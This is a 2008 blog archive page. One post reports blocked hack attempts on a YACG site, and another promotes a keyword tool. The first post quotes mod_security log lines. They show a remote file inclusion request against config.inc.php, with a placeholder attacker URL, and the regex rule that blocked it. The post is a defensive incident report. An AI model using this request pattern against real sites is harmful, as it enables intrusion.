Archive for January, 2008

The reason for all those 500 errors…

Published by busin3ss on January 8, 2008 in Uncategorized. Comments

We are being flooded by hack attempts. Here is an excerpt of the access logs:

[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]

It’s all coming from the same host, and I have a pretty good idea of what they are attempting… But I’m not sure if it’s an automated attack and I’m a random victim or it’s a personal attack against [YACG].

I will take care of this ASAP and let you guys now what this is all about…

Need keywords for your [YACG] sites? Free Keyword Tool

Published by busin3ss on January 6, 2008 in Uncategorized. Comments

If you need keywords for your [YACG] sites, you might want to check this out.

http://busin3ss.name/free-keyword-tool

Have fun!